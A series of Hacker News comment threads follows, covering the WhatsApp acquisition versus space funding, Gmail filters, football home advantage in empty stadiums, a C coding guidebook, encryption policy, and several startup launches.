in the Google Lunar XPRIZE. Both are arguably good things to spend money on,
but investment flows sometimes attempt to follow where the big returns are
likely to be.
~~~
kordless
Short term gains for centralized pools of power != long term gains for
humanity. They are going to mine the data in WhatsApp so they can optimize the
way they sell to you.
What we need to be doing is mining the Moon for power. We're going to need it
for all the advertising servers.
~~~
benihana
> _What we need to be doing is mining the Moon for power_
This meme of we should mine Helium-3 from the moon needs to die already. This
kind of thinking is so backwards it's astounding to me that anyone can come up
with it. Why would we mine the moon for power that we can't yet use? No one is
going to go to the moon to mine energy for a fuel source that _might_ be in use in
the future. It's like spending billions marketing to people in sub-saharan
Africa before you have a product designed, much less built.
~~~
sentenza
We'll need to tap the Moon-He3 when we want to fuel manned interstellar
missions. So probably not this year.
------
blakeeb
Software Engineer at SpaceX here. Exits like WhatsApp not only cost more than
space exploration, but also make recruiting much more difficult for many
companies.
Our best engineers are very entrepreneurial. They don't hesitate to tackle
massive challenges, often without even being asked. When a large exit occurs,
it's an unfortunate siren call: "you could be making billions, writing way
less complicated code."
Why am I taking a salary somewhere when some guy just made billions in four
years? Did he have to worry about loss of human life if his code failed?
I make my own internal siren shut up by being a complete space geek, but
rockets are not always as intriguing to prime candidates in the recruiting
pipeline.
It's time for a reality check.
How many people actually exit with this level of success? Why is enabling our
species to be interplanetary often a harder sell than the prospect of trading
years of your life for a small chance that you might exit with a few billion
dollars?
Greed. It's terrifying how much it prevails in our startup culture.
The size of one's exit is far less important than the impact of one's
technology on the world.
Hack things that make the world better (or other worlds). If riches come as a
result, great, but our startup culture's emphasis on valuation over innovation
is, in my opinion, our achilles' heel.
(My views are completely personal opinions and do not reflect the views of the
company. I love our startup culture and am proud to be a part of it, but I'm
convinced that when I look back I will clearly view the code I've written here
to be way more important for humanity's progress than the code I've written
for entrepreneurs' selfish attempts at billion dollar exits)
------
loneranger_11x
I am not sure why people are so dissatisfied with the cost of the WhatsApp
acquisition. There is significant value in WhatsApp's huge network. You know
what else cost almost as much as NASA's entire budget last year? The bonuses
paid to Goldman Sachs' employees:
[http://www.ibtimes.co.uk/goldman-sachs-pay-bonuses-
hit-12-61...](http://www.ibtimes.co.uk/goldman-sachs-pay-bonuses-
hit-12-61bn-2013-1432575)
~~~
hnnewguy
> _Bonus paid to GoldmanSachs ' employees_
Goldman Sachs has over 30,000 employees and earns over $8BB in _profit_ a
year. That's _real_ money in the pockets of stakeholders.
But, as seems to be common on HN, I'll bet you think bankers are scum and the
people at WhatsApp are doing yeoman's work, selling ads and handing data over
to spying agencies.
~~~
vikp
The interesting part (for me at least), and the real reason that you guys are
having a debate at all, is that our notion of value is so far abstracted
from human necessities these days that it's hard to put a finger on what value
is.
There are a few things that we inarguably need -- food, shelter, water, and so
on. See the bottom two tiers of Maslow's pyramid:
[http://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs](http://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs)
.
It's the middle tier and above when things start to get fuzzy and hard to
define. When most people globally were engaged in work towards the bottom, it
was easy to understand the value that was being added (I grow food! I help
myself and others survive!).
Now, when most people (at least in developed countries) are doing things
towards the top of the pyramid or off of the pyramid entirely, it's harder to
define value. Money is one proxy (which you are using), but it's probably a
poor one. I would love to see better ones.
------
ig1
Flagged because the comparison of asset cost to operational cost is
nonsensical.
It's like telling someone buying a million dollar apartment "but you could
rent a mansion for a million dollars/year instead".
~~~
stackcollision
The OP is not necessarily talking about operation cost here. For the cost of
what Facebook paid for WhatsApp I could launch 4.6 million kilograms into
orbit on a Falcon 9, which is essentially the cost of lifting the ISS. When
you're talking about space, the cost of launching should be included in your
asset cost, because otherwise your million dollar satellite is worthless.
~~~
rwmj
Facebook didn't pay it all in cash. They paid much of it in (soon to be)
worthless Facebook stock.
And this is the problem with the comparison. To fund a space mission, Facebook
would have had to either try to realize the value through another huge stock
sale, or it would have to use up its cash reserves. The first option is
essentially impossible. The second would lead to massive lawsuits as well as
having a very uncertain outcome (you think a bunch of web designers could
really build a rocket?)
~~~
Tloewald
Thanks for making this point. Buying a company with stock doesn't actually
result in someone spending something to get something, it merely merges two
companies and assigns ownership of the combined entity.
------
goatforce5
The value to Facebook of WhatsApp is greater than them funding NASA for a year
and a bit.
Similarly, I could probably feed a starving kid in a third world country for a
day or two for $4, but instead I'm going to go buy a latte, because apparently
that has a greater reward for me personally...
Now I feel like a jerk. Thanks Zuckerberg!
------
SapphireSun
For what it's worth, the fact that WhatsApp is enabling advanced
communications in poor countries for free probably liberates a vast untapped
quantity of human capital. That's a much clearer value proposition than a lot
of other startups (e.g. Twitter, which merely eases connection rather than
making it possible for cash strapped people).
That said, I'd be a fan if Silicon Valley's venture capital got really into
making escape velocity affordable for the average Joe....
~~~
rwmj
WhatsApp is basically email, and we've had email for a while.
~~~
shawabawa3
And mars is basically the earth, and we already know almost everything about
the earth
~~~
Fomite
> we already know almost everything about the earth
Not even close.
------
melling
Well, this article is a complete waste of time, and it's #1 on HN, of course.
What the hell, geeks can't help themselves. Seriously, people need to quit
whining about stuff like this, accept it, and figure out how to solve whatever
problem they'd like to see solved. The US economy is almost $17 trillion.
Together, we're freak'in rich.
[http://en.wikipedia.org/wiki/Economy_of_the_United_States](http://en.wikipedia.org/wiki/Economy_of_the_United_States)
People will fund comic books, video games, etc on KickStarter. I think that
market is approaching $1 billion. Perhaps, there's another multi-billion
market for a private "space program", medical research, or whatever. Create
more X-Prizes ([http://www.xprize.org](http://www.xprize.org)). They create a
lot of value for the investment. You only pay the winner but you get effort
from all the participants.
~~~
coldtea
> _The US economy is almost $17 trillion. Together, we 're freak'in rich._
Well, if you ignore the fact that the vast majority of that $17 trillion
belongs to astonishingly few people.
In that sense, then yes, Warren Buffet and some family living in a shack in
Mississippi are rich together.
~~~
melling
Yes, we can ignore that fact. That was a given, right? There's plenty of money
in the US economy that can be funneled into other projects. If there wasn't,
KickStarter wouldn't exist, correct?
~~~
coldtea
Kickstarter's existence just means that there are a number of people who can
give $10 or $100 for a project they like.
I don't see how to go from there to the assumption that's plenty of money for
all kinds of projects.
Most Kickstarter campaigns are quite small in requested budget for example.
Space exploration, not so much.
~~~
melling
Nowhere did I say that the solution was to exactly imitate KickStarter, or
even imitate KickStarter to any degree. The solution is left for someone to do
some creative thinking, and a lot of work.
I'm sure someone like you can give a million reasons why an electric car
company won't work. It's up to that one in a billion person to solve the
problem. In the meantime, I get tired of people complaining about why we
should solve that problem. Oh... wait...
------
welshrats
Everyone is talking about the value of WhatsApp's social network to
advertisers, but I thought one of the key points of WhatsApp was that it was a
paid service and they collect no data on you specifically because they aren't
interested in selling ads. [[http://blog.whatsapp.com/index.php/2012/06/why-
we-dont-sell-...](http://blog.whatsapp.com/index.php/2012/06/why-we-dont-sell-
ads/)] Should people who bought into the idea that they were not the product
be looking for a new paid WhatsApp like product?
~~~
TeMPOraL
But don't they _have to_ collect the data about you because law? (to use the
newly allowed English construct ;)).
Also, in the blog post they didn't explicitly state that they don't collect
data; they wrote that they just don't care about it much when thinking about
product development.
------
mallamanis
Comparing WhatsApp to space exploration is unfair. Arguably both of them are
equally useful/useless (depends on who you ask). But what about if all (or
even half) that money had been spent to (i.e.) cancer research or something
that would radically improve people's lives? I think that's the "utility
trade-off" question one should ask...
------
t1m
The population of Kenya is almost 50 million people.
Its GNP is $19.9B.
The population of WhatsApp is 50 employees!
~~~
shmed
To be fair, GNP is an annual value, while WhatsApp's valuation includes its
whole value, including potential future annual revenues.
------
jneal
I can't help but think we're stuck in the middle of another .com bubble
~~~
antocv
If its stuck its not a bubble, its supposed to inflate
~~~
shmed
He said "we" are stuck, not the bubble is stuck.
------
hartator
I guess when people are saying that space exploration costs a lot of money, they
are referring to state programs like NASA, not Google Lunar...
------
stefantalpalaru
You can't pay for space exploration with dotcom bubble stock.
------
mw67
Whatsapp is certainly more useful to humanity than space exploration.
~~~
S4M
Are you being sarcastic?
~~~
mw67
No, I truly believe that having a way for everyone to communicate for free,
privately, and anywhere is just so great. This level of communication enables
so many possibilities for people that couldn't be achieved so simply otherwise.
I live in Hong Kong and do not know a single person not using whatsapp. It
helps everyone. Although I'm a huge fan of space exploration as well, I still
think letting people communicate easily is more valuable for our day to day
lives.
~~~
S4M
Oh OK, I see what you mean now.
> No, I truly believe that having a way for everyone to communicate for free,
> privately, and anywhere is just so great.
I agree with that, but whatsapp isn't a new way of communicating - in the
sense that it's not a new protocol like the phone or internet. While it's
convenient it's not revolutionary and I am sure that Hong Kongers would be
using something else.
Also you don't know what space exploration could bring to your everyday life
(probably we could build new stuff from materials not available on Earth or
that are very rare...).
~~~
mw67
You're absolutely right on both points :)
Ask HN: Anyone else have long-standing GMail filters that have stopped working? - JabavuAdams
Some filters I've had working in Gmail for years seem to have intermittently stopped working over the last year or so. I'll have a filter with a simple subject line match, and now I'm getting these messages in my Inbox, when they should be bypassing it.<p>Haven't been able to discern any pattern to this yet, but I haven't really dug into it. I wonder why the regression? Is this some kind of throttling? Like approximate matching?
======
byoung2
I have noticed that occasionally the filters seem to run on a delay... I have
filters to bypass the inbox and apply a label. I will see the email in the
inbox for up to an hour before the filter runs and then later I see the label
applied and the email is no longer in the inbox.
~~~
moonka
I've noticed the same on Spam filtering as well. It used to be instant but now
more and more I see things show up for a few minutes before disappearing. I
also just recently set up a new gmail account that required some filtering to
a sizeable inbox and it was very painful because of the delays.
~~~
codenut
This is what you call eventual consistency.
------
mikekchar
I had all my filters stop working about 5 or 6 months ago. I had to remove
them all. New ones made exactly the same worked fine, but since I don't trust
them now, I don't have any filters any more.
No idea how it broke, but I guess it's a matter of software upgrades without
the requisite data migration. Google's data composition is _very_ complex so I
can see this happening from time to time.
The class divide in Silicon Valley - ahsanhilal
http://www.weeklystandard.com/articles/silicon-chasm_768037.html?page=2
======
ahsanhilal
A bit reductionist in its claims I would say
Show HN: My first startup - So Yummy - overworkedasian
http://soyum.my/
After months of baking with my girlfriend, we decided to launch our first startup together: SoYummy.

I got the inspiration when she first got a subscription to Birchbox and I thought, there must be a 'bakery/sweets' version of Birchbox. After some research, I discovered that there really isn't anything like this. This won't make me a million dollars overnight, but we wanted to give this a shot and really try to make it work. Let me know if you have any questions!
======
overworkedasian
After months of baking with my girlfriend, we decided to launch our first
startup together: SoYummy. I got the inspiration when she first got a
subscription to Birchbox and I thought, there must be a 'bakery/sweets' version
of Birchbox. After some research, I discovered that there really isn't
anything like this. This won't make me a million dollars overnight, but we
wanted to give this a shot and really try to make it work. Let me know if you
have any questions! Would love some feedback!
------
botolo
Nice idea. I look forward to seeing the kind of cookies you will provide and
the price of the subscription.
------
cdvonstinkpot
Clickable:
<http://soyum.my/>
Nvidia announces support for SLI on AMD chipsets - primesuspect
http://tech.icrontic.com/news/nvidia-announces-support-for-sli-on-amd-chipsets/
======
daeken
Why not link the original source, without the ridiculous commentary?
[http://blogs.nvidia.com/2011/04/you-asked-for-it-you-got-
it-...](http://blogs.nvidia.com/2011/04/you-asked-for-it-you-got-it-sli-for-
amd/?sf1380441=1)
~~~
primesuspect
Because the ridiculous commentary makes me laugh, and I am a human being who
enjoys that sort of thing.
------
kitanata
This is too funny. Just yesterday I returned my Nvidia GFX 640 SE because
Fermi was not compatible with many AMD chipset motherboards, including mine. I
picked up the AMD Radeon HD 6850 instead. It runs like a charm.
------
Bandrik
(insert generic trolling statements that slam NVIDIA here)
Empty stadiums have shrunk football teams’ home advantage - prostoalex
https://www.economist.com/graphic-detail/2020/07/25/empty-stadiums-have-shrunk-football-teams-home-advantage
======
elgenie
Home field advantage lessening but not disappearing is as expected. There are
two major sources of home field advantage (based on US sports):
* What fans influence: subconscious referee biases (not wanting to be booed for a close call), heckling that slightly impacts players’ focus, objects being waved in their line of sight, noise levels rising at inopportune times, etc.
* Travel/comfort: the home team players sleep in their own custom-tailored sleeping environments (these can include stuff like oxygen tents, not just nice mattresses), don’t spend time encased in a plane / train / bus environment not designed for optimizing future athletic performance, and don’t have travel stresses and logistical headaches. Also for those inclined, the local club / strip club / groupie scene doesn’t hold the same mysterious allure on a random Tuesday night as it might for the lad from out of town.
The second set of factors remains even when fans aren’t allowed inside the
arena.
~~~
mrisoli
And maybe not so relevant these days because most pitches are standard size,
but years ago football pitches could vary in size, 90-120m in length, and
45-90m in width; maybe in the past even more, as I remember seeing some
pitches quoted as long as 130m+.
Teams who were on the boundaries of these often took advantage of it. My home
team played on a larger than average pitch, and you would clearly see teams
that pressed at full intensity lose a lot of gas by the second half; the best
coaches knew how to make this count. On the other side of the spectrum, teams
with shorter fields favoured playing long balls straight from goal kicks to
the strikers.
Tbf I miss a little bit the days where these small inconsistencies would
affect the game and require a little bit more studying on the coaches part.
~~~
zimpenfish
The numbers you quoted are still the standard although international pitches
are constrained to 64-75m wide, 100-110m long. That probably means top teams
are likely to use the international standard or at least have the option to
mark the pitch thusly when things like the World Cup or Euros need stadiums.
~~~
mrisoli
In Brazil they would vary wildly so that's where my nostalgia comes from,
after the WC in 2014 pretty much all of them were standardised to 105x68
------
ComputerGuru
A bit of a shameless plug, but a few years ago I Googled for scientific and
statistical analyses of home field advantage and didn't find anything, so I
ended up crunching the numbers for myself.
With the caveat that this is for baseball and not football, home field
advantage has shrunk tremendously over the years. Just look at the curve of
"field kindness" over the history of the MLB, it is insane how much of a
difference the field you were visiting used to make!
[https://neosmart.net/blog/2016/homefield-
advantage/](https://neosmart.net/blog/2016/homefield-advantage/)
(my favorite bit is the curve ball when it comes to fields that confer a
statistical _advantage_ to the visiting team!)
~~~
regulation_d
tbh, I don't really understand why Coors would be such an advantage. It's not
like the visiting team doesn't also benefit from the additional ball flight.
Do you think it has to do with roster building? Like the Rockies don't spend
money on pitching because pitching has less value at Coors, so they load up on
offensive talent instead?
~~~
willturman
In addition to farther fly ball flight, the thinner air in Coors Field lessens
the amount of distance a breaking ball moves when pitched. You'd think they
would spend top dollar for every pitcher with a heavy 94+ mph sinker.
While other teams play a single (or handful of) series a year at Coors Field,
the Rockies have to adjust to breaking pitches being more effective while
playing away half the time which would be a bigger disadvantage than the ball
not flying as far at away ballparks.
------
tomasz207
Freakonomics covered this in one of their podcasts. Their finding was that
home-field advantage had more to do with the crowd influencing the calls of
the officials. They would typically favor the home team. I wonder if this will
change further with the use of VAR.
[https://freakonomics.com/2011/12/18/football-freakonomics-
ho...](https://freakonomics.com/2011/12/18/football-freakonomics-how-
advantageous-is-home-field-advantage-and-why/)
~~~
dfxm12
It's amazing that the MLB has the smallest home field advantage, despite the
fact that baseball fields are actually pretty different from each other.
I would've thought stuff like being used to the visual backdrop behind a
pitcher's arm would let you see a pitch better or knowing where to stand to
best play a ball caroming off the outfield wall would give more of an
advantage.
~~~
InitialLastName
> It's amazing that the MLB has the smallest home field advantage
And given that, relative to the other sports, there's an actual difference in
the rules and play of the game based on which team is at home (less so now that
the DH is in both leagues).
------
bluejellybean
I'm really surprised we don't hear more about teams using tools like VR to
play on the 'opponent's turf'. One thing I noticed playing sports was how
terrible we could feel just from not knowing where the locker rooms were when we
got off the bus. I would love to see a study along the lines of: make players
travel to opponents' facilities a few times and check the results.
The same could easily take place in VR for the opponent's facilities
and arena. Model their locker rooms, field/court/etc, model screaming fans of
the wrong color, model boos, etc etc. Essentially try and eliminate some home
field advantage by making it feel more like home.
~~~
dmurray
Not VR but it was reported the English rugby team were training in front of
giant speakers to prepare for matches against Wales [0], who have a famously
loud crowd and a stadium that amplifies it, especially if the roof is closed.
I'd be surprised if gridiron teams don't do something similar since crowd
noise is genuinely a tactical issue there (it's more disruptive to the
offense) in addition to a psychological one.
[0] [https://www.skysports.com/rugby-
union/news/12333/9699222/six...](https://www.skysports.com/rugby-
union/news/12333/9699222/six-nations-england-using-speakers-to-replicate-
noise-ahead-of-wales-game)
------
russellbeattie
The Italian league games I've seen played in empty stadiums have been great. I
think adding the sense of hearing back into the game due to lack of crowd
noise does a lot for a team's coordination and thus quality of play. Maybe
this is just my opinion based on a few matches, but there is a palpable
difference in play.
Also a lot less flopping on the ground in fake agony. With no crowd to play
to, players fall over and then get back up again. It's very refreshing to
watch.
~~~
smabie
I was under the impression that they fell over in agony for the refs, not the
crowd? But then I don't know much about soccer.
~~~
ehnto
Perhaps it's harder to justify internally if the only people watching know
exactly what you just did? I've always been surprised by the shamelessness of
soccer dives, I definitely don't understand it.
~~~
dynamite-ready
A totally subjective answer here, but I think it's because of the speed the
game is played at.
It's very easy to trip when sprinting at full speed while concentrating on a
single object. The slightest external force will put you on the ground very
quickly.
Rugby, Gridiron and Ice Hockey players will also know that, but frequent falls
under pressure are expected by the rules. In soccer, it's a lot more subtle
(shirt pulling, various rules around obstruction, the height at which you keep
your hands... all sorts). There's plenty of opportunity fool a referee, so you
will instinctively try to do so. Especially if your style of play generally
draws opposing players into fouling you regularly already.
I'd say that the introduction of video referees (VAR) are probably more
effective in stopping that kind of behaviour, than empty stadiums. But you'd
never know.
------
dynamite-ready
I also wonder if player performance has measurably improved (or degraded),
when playing regularly without an audience.
~~~
dairylee
I think this is interesting and something I've thought about since the return
of football.
Jurgen Klopp was always trying to get the crowd engaged and pumped up because
he believes it has a huge effect on how his Liverpool team play. Without the
crowd they seem to be missing that extra 1% of intensity that made them
incredible pre-lockdown.
Whereas Manchester City probably don't feed off the crowd as much as Liverpool
do. Manchester City are all about rehearsed routines so they may even find it
easier without a crowd as they'll be able to communicate much easier.
~~~
sleavey
Hard to say because by the start of lockdown Liverpool had basically wrapped
up the title. Their performance dropped after they were mathematically
champions.
~~~
amateurdev
Yeah I agree with this. They were in top form and the crowd obviously helped.
Anfield is massive for the team with supporters around. But after having such
a long break due to the lockdown can change the dynamics. Its hard to produce
that kind of form after a hiatus. And yes, maybe there even was something
about already having won the league mathematically. It can calm the players
and lower the intensity slightly.
------
niffydroid
I can understand this. Portsmouth at home is pretty loud and vocal. After
watching Pompey fail in the play-offs, a crowd might have helped, but then again
the defeat is probably down to Kenny Jackett's football style being horrible. #JacketOut
------
_the_inflator
Very interesting.
I don't know whether this study measures only the outcome or contributing
factors. For example, in Germany, anti-COVID measures led to the
following result: way fewer to no discussions with the umpire. Pack forming
has been forbidden. Empty stadiums are only part of the measures but, in my
opinion, not the contributing factors. These factors contributed massively to
the pace of the game. And if no players are trying to influence the umpire -
well, you get different results.
------
amachefe
Familiarity with the stadium also counts. I mean, you are going to play in an
arena 19 times vs once; there will be differences.
------
known
A disadvantage of extrinsic motivators relative to intrinsic ones is that work
does not persist long once external rewards are removed
[https://en.wikipedia.org/wiki/Motivation#Extrinsic_motivatio...](https://en.wikipedia.org/wiki/Motivation#Extrinsic_motivation)
| {
"pile_set_name": "HackerNews"
} |
Raspberry Pi : Cheat Sheet ($25 ARM computer) - codedivine
http://www.silicon.com/technology/hardware/2011/10/03/raspberry-pi-cheat-sheet-39748024/?s_cid=991
======
codedivine
I am aware that HN discourages editing of page title. In this case, I added
($25 ARM computer) to title as otherwise the title would have made no sense to
those not familiar with the Raspberry Pi.
That said, it is a tiny board (about the size of a USB stick) with 700MHz
ARM11 and a Broadcom GPU with OpenGL ES 2.0 support and 1080p video decode. It
will have an HDMI port and can connect to keyboards and mice and will run
Linux. Should be available in November. More details here:
<http://www.raspberrypi.org/>
Obama calls for public debate over encryption - declan
http://wtop.com/tech/2015/02/obama-calls-for-public-debate-over-encryption/
======
dalke
We've had, what, 20+ years of public debate, if I start counting from the
Clipper chip.
I find it hard to believe there's more to say on the topic. Well, not unless
law enforcement and his administration reverse course and start releasing more
information on the topic. Otherwise we're left with the handful of
investigative reporters and whistleblowers who reveal how internal US policies
actually work.
No, I can only believe this is a wishy-washy non-committal message, using a
lot of words to avoid the topic.
------
angersock
_He said people who favor airtight encryption also want to be protected from
terrorists._
They also favor not being no-knocked and shot in the middle of the night, or
having their dogs shot, or getting stuck in a holding cell until the police
are bored with them, or being shot by drones overseas, or just plain
disappeared.
EDIT:
See also
[https://news.ycombinator.com/item?id=9048629](https://news.ycombinator.com/item?id=9048629)
.
They've basically rooted all avenues of communcation...I fail to feel sorry
for them.
OMG: Our Machinery Guidebook - onekorg
https://ourmachinery.com/files/guidebook.md.html
======
Aardappel
Generally a wonderful set of minimalistic rules, much could carry over beyond
C.
Except for: "OMG-API-3: Unsigned integers are preferred over signed".. I feel
they're on the wrong side of history with this one.
"Prefer unsigned" only works if you can do 99% of your codebase this way,
which, besides LLVM, probably doesn't work for anyone. Having a codebase that
is 99% signed is much more feasible. The worst is a codebase with plenty of
both, which will be guaranteed endless subtle bugs and/or a ton of casts.
That's what they'll end up with.
Apparently the C++ committee agrees that size_t being unsigned was a huge
mistake (reference needed), and I would agree. Related discussion:
[https://github.com/ericniebler/stl2/issues/182](https://github.com/ericniebler/stl2/issues/182)
[https://github.com/fish-shell/fish-
shell/issues/3493](https://github.com/fish-shell/fish-shell/issues/3493)
[https://wesmckinney.com/blog/avoid-unsigned-
integers/](https://wesmckinney.com/blog/avoid-unsigned-integers/)
Even LLVM has all this comical code dealing with negative values stored in
unsigneds.
The idea that you should use unsigned to indicate that a value can't be
negative is also pretty arbitrary. Your integer type doesn't represent the
valid range of values in almost all cases, enforcing it is an unrelated
concern.
~~~
flohofwoe
I can see where they're coming from, signed integers come with all sorts of
caveats in C and C++ from overflow being undefined behaviour (yet modulo-math
often makes sense when integers are used as array indices) to bit twiddling
surprises. "Almost always unsigned" sounds like a good rule to me to avoid
such pitfalls, especially when 'common math stuff' is usually done with floats
or special fixed-point formats.
~~~
Aardappel
Overflow being UB is not something you run into easily with typical math,
index and size uses (not as often as your run into unsigned issues, in my
experience). Yes, bit-twiddling should be unsigned, but it is very easy to
make this code isolated, and convert from signed values storing these bits, if
necessary.
But I am going to defer to authority here: [http://www.open-
std.org/jtc1/sc22/wg21/docs/papers/2019/p142...](http://www.open-
std.org/jtc1/sc22/wg21/docs/papers/2019/p1428r0.pdf)
------
vietjtnguyen
Quick typo under OMG-CODEORG-2:
#pragma once
#ifdef __cpluspus // <-- should be __cplusplus
extern "C" {
#endif
#include "api_types.h"
// ...
#ifdef __cplusplus
}
#endif
Can't say I'm a fan of OMG-CODEORG-3, however, it sounds like compilation time
is a key metric for them.. I prefer a John Lakos style "physical components"
set up which emulates a type-as-module inclusion style. At least OMG-CODEORG-3
clearly states that include order becomes important as a result.
~~~
midnightclubbed
Agree, CODEORG-3 adds a bunch of pain. There's a reason other languages don't
have headers, but since C programmers have to live with them, can't I just
include the single relevant header and move on with writing my code? Yes, there
is a shared cost to that (compile time), but '#pragma once' is well supported
and futzing with header order is a non-trivial time-sink too.
On the same lines the template 'cute tricks' are where you get your
performance, stability and readability from C++. I definitely agree that you
should drop into assembly to see what the compiler is doing with your code but
that can and should apply to heavily templated code too.
~~~
bobdobbs666
Pragma once only prevents double inclusion within the translation unit.
On large projects bad header hygiene can cause significant compilation
overhead.
------
bradknowles
NB: For those who are not aware, ourmachinery.com is a game engine development
company.
------
mwcremer
_I.e., use a double parameter that specifies seconds, instead of an uint32_t
that specifies milliseconds._
This can have surprising and sometimes unpleasant consequences; see
[https://0.30000000000000004.com](https://0.30000000000000004.com)
~~~
United857
Better yet, use std::chrono. Yes, it's C++. But this is an example of how
properly applied bits from C++ can make things easier to reason about and
type-safe, rather than "let's avoid C++ as much as possible".
No ambiguity for the programmer as to what the underlying units are, and no
unnecessary int/float conversions. All the book-keeping and conversions are
taken care of by the compiler with zero run-time size or perf overhead.
~~~
flohofwoe
std::chrono is a terribly overengineered API even for the STL, and many game
companies have banned parts or all of the STL for good reasons (usually not
std::chrono related though).
Using an uint64_t (instead of uint32_t or double) to carry "opaque ticks", and
a handful conversion function to convert to real-world time units is fine and
just a few lines of code.
~~~
niklasgray
This is exactly what we do.
------
mistrial9
the layout and typesetting on this looks good in Firefox 70!
view-
source:[https://ourmachinery.com/files/guidebook.md.html](https://ourmachinery.com/files/guidebook.md.html)
<meta charset="utf-8" emacsmode="- _\- markdown -_ -">
~~~
corysama
Formatted by [http://casual-effects.com/markdeep/](http://casual-
effects.com/markdeep/)
------
Animats
Objects as structs with function pointers? 1990 is calling. I'm not a huge C++
fan, but trying to emulate C++ concepts in C is kind of lame at this late
date.
~~~
rootlocus
Just goes to show C++ failed the zero overhead principle.
~~~
Animats
If you don't have virtual functions, a C++ object is just a struct associated
with static function links.
------
rootlocus
OMG-DESIGN-4: Explicit is better than implicit
Ahh, straight out of the zen of Python!
$ python -c "import this"
~~~
michaelcampbell
Django: "hold my beer"
| {
"pile_set_name": "HackerNews"
} |
The French World Cup Win and the Glories of Immigration - okket
https://www.newyorker.com/news/daily-comment/the-french-world-cup-win-and-the-glories-of-immigration
======
masonic
Fake news. Most of the African-born players mentioned were _already French
citizens_ , many from birth. Hardly any were "immigrants". That would be like
calling a Puerto Rican or someone born in American Samoa working in mainland
USA an "immigrant".
~~~
Karishma1234
Well, the point is lost on you. Those players played for France because their
parents immigrated.
| {
"pile_set_name": "HackerNews"
} |
PandoDaily Acquires NSFWCORP - liordegani
http://pandodaily.com/2013/11/25/pandodaily-acquires-nsfwcorp-to-double-down-on-investigative-reporting/
======
protomyth
From the Guardian article:
Carr said he expects Pando to start making more waves,
but for different reasons. Pando’s investigative team
would target all the most powerful people in the Valley
and challenge them “when they need challenging,” he
said. Some of Pando’s investors “were going to shit
himself” when they heard NSFW’s team was joining
Pando, he added.
Somehow, I really doubt this part. I think non-investors have a much higher
probability of getting "challenged" than investors.
------
jaredmck
They're such investigative journalists that they won't even provide any
details of their own transaction. Oh, wait.
------
rb2e
Don't wish to be a grump but the original announcement post is from Pando
Daily/ Sarah Lacy @ [http://pandodaily.com/2013/11/25/pandodaily-acquires-
nsfwcor...](http://pandodaily.com/2013/11/25/pandodaily-acquires-nsfwcorp-to-
double-down-on-investigative-reporting/) and this post doesn't really say much
</end grumpiness>
~~~
untog
Anything that gives Pando Daily less traffic is all good by me.
------
Brajeshwar
D__n! There goes the chance to sell my site to NSFWCORP.
------
thrillgore
I expect a very public resignation within three months.
| {
"pile_set_name": "HackerNews"
} |
How to charge money for things that don't exist yet - SteliE
https://www.linkedin.com/today/post/article/20140423214327-7006635-how-to-charge-money-for-things-that-don-t-exist-yet
======
calcsam
Surprised this didn't get more upvotes. It's great.
| {
"pile_set_name": "HackerNews"
} |
Apply HN: Lenzy – affordable photographers guaranteed to suit you, booked in 50s - louisswiss
With Lenzy you can choose the perfect photographer for your needs, get a guaranteed price and book/pay within 50 seconds. Bookings will either take place via our web-app or, more commonly, our JS plugin embedded in third party websites and apps where users might need the services of a photographer (e.g. a job platform, shopify, airbnb, ebay etc). Instead of choosing a photographer based on their profile, our photo recommendation engine lets you choose the right photographer for your needs based on samples from their portfolios in a tinder-style interface.

As avid photographers ourselves, we know that this is the optimal way of finding the right photographer for your project, due to it being a much more subjective, individual perspective than other on demand services such as cleaning, transport etc, where safety and peer-approval are paramount (the photographer who my friend thought did a great job at her wedding, for example, is probably not the right person for my e-commerce product photos). Interestingly, thanks to the general increase of interest in photography and the improvement in photography hard- & software, 90% of the 'best' photographers out there are actually amateurs, art-students and other hobby-photographers who 'occasionally do shoots for friends'. By harnessing this eager supply, matching efficiently and increasing the demand by making awesome photos available to everybody at a price they can afford, we can offer a better quality experience than 'professional photographers' at less than half of the price.

We are a team of 3, who have worked together successfully on projects before...

- 1 designer & professional photographer
- 1 (mainly front-end) dev/amateur photographer/sales guy
- 1 back-end dev (not great at taking photos, but has seen thousands in his lifetime)

We have a working beta and partnerships with third party sites which are profitable.

We would love to field your questions/feedback :)
======
fitzwatermellow
Lots of nascent demand for pro photo services. Culture is becoming visual on
an unprecedented scale. Two quick queries:
1\. How quickly do you think you could scale this globally? Customer requests
a shoot on a volcano in Greenland for example ;)
2\. Why not provide a full service solution? That is not just the
photographer, but for a fashion brand shoot for example, all the models, hair,
makeup, location, catering, legal clearances and the other 100 things I am not
anticipating ;)
~~~
louisswiss
Thanks, we agree! Even more importantly, the definition of 'pro photo
services' is changing rapidly from _high prices, fixed retail location_ to
_high quality, style & subjective fit_.
1\. This would be awesome and hopefully we can manage it someday, however a
lot of stock photo websites actually cover this pretty well already (assuming
you just want custom photos of the volcano). In our experience, if you can
afford to actually have your event/wedding/CV-headshots (now that would be an
awesome LinkedIn profile photo) taken on location in Greenland, you tend to
find shipping out your 'usual' photographer with you and putting them up in a
hotel as a negligible cost ;)
2\. This could be something we expand to later, but we want to focus on what
we know and do best now and make it a really great service. Also, our JS
plugin means we partner with companies already offering some of these services
to generate free new bookings, so we don't want to alienate anybody :)
~~~
louisswiss
Forgot to add that in a lot of cases (especially fashion shoots), there is
more equipment needed (lighting, reflectors etc) and normally a second person
is needed to 'handle' this equipment during the shoot.
We are working with our photographers to give every one of them access to this
service/equipment and normally one of the models will help out as the second
person, keeping costs low.
------
kumarski
In this business, the proof is in the results.
I imagine many YC folks have seen these types of companies before.
I can name 2 in my head, but they don't do the tinder style interface.
eversnapapp.com PrettyInstant.com
Godspeed. I think you're on to something.
~~~
louisswiss
Thanks for the inputs - I agree, there must be 100s of similar applications
each year relating to on demand photography.
We love the concept of eversnap, however it is a bit of a risk leaving your
wedding day/event in the hands of (possibly inebriated) guests :)
I think our target market is less events/weddings and more the other areas of
personal and professional life where great photos can make a BIG difference,
but price and time constraints (for finding the right photographer) discourage
people from using traditional services (like PrettyInstant). Examples would be
when renting out your home, selling something online, photos for the marketing
department (headshots, teamphotos, e-commerce product photos, CV-style photos
etc.
We love the tinder interface and it seems to work well, but at the end of the
day it won't put us head and shoulders above the competition. What really sets
us apart is that with us, you book a photographer by judging how they shot a
photo which had similar requirements to your shooting. It seems crazy to us as
photographers that PrettyInstant (for example) guarantees to only work with
'the best' photographers, yet depending on what style you are looking for, the
lighting and the general setting (is it a headshot or documenting a party?),
any one photographer could be the perfect fit for you or they could be
terrible.
~~~
scotu
disclosure: I work on eversnap
